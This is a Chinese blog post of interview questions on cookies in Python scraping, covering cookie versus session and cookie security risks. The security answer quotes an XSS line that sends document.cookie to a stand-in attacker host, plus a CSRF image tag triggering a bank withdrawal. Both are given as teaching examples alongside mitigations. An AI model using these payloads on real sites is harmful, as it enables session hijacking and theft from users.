python爬虫Cookie有哪些常见的面试题？

我们在面试中经过会遇到一些需要明确的知识点，这和我们学习代码和理论知识的时候有一点区别，需要以问答的形式展现，在逻辑的考察上也会更加的细致。我们最近也学习了不少python爬虫中cookie的内容，那么在面试中我们会遇到哪些面试题呢？今天小编整理出其中两个较为常见的题目，希望对于大家面试的时候有所帮助。

1.Cookie和Session关系

都是为了实现客户端与服务端交互而产出

Cookie是保存在客户端，缺点易伪造、不安全

Session是保存在服务端，会消耗服务器资源

Session实现有两种方式：Cookie和URL重写

2.Cookie带来的安全性问题

会话劫持和XSS：在Web应用中，Cookie常用来标记用户或授权会话。因此，如果Web应用的Cookie被窃取，可能导致授权用户的会话受到攻击。常用的窃取Cookie的方法有利用社会工程学攻击和利用应用程序漏洞进行XSS攻击。(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;HttpOnly类型的Cookie由于阻止了JavaScript对其的访问性而能在一定程度上缓解此类攻击。

跨站请求伪造（CSRF）：维基百科已经给了一个比较好的CSRF例子。比如在不安全聊天室或论坛上的一张图片，它实际上是一个给你银行服务器发送提现的请求：<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">当你打开含有了这张图片的HTML页面时，如果你之前已经登录了你的银行帐号并且Cookie仍然有效（还没有其它验证步骤），你银行里的钱很可能会被自动转走。

解决CSRF的办法有：隐藏域验证码、确认机制、较短的Cookie生命周期等

以上两个题目都不是直接考察cookie的内容，在使用方面联系了其他的一些知识点，需要做到对cookie的灵活运用和详细了解，这里全部分享给大家，相信小伙伴们能有不少的启发。更多Python学习指路:PyThon学习网教学中心。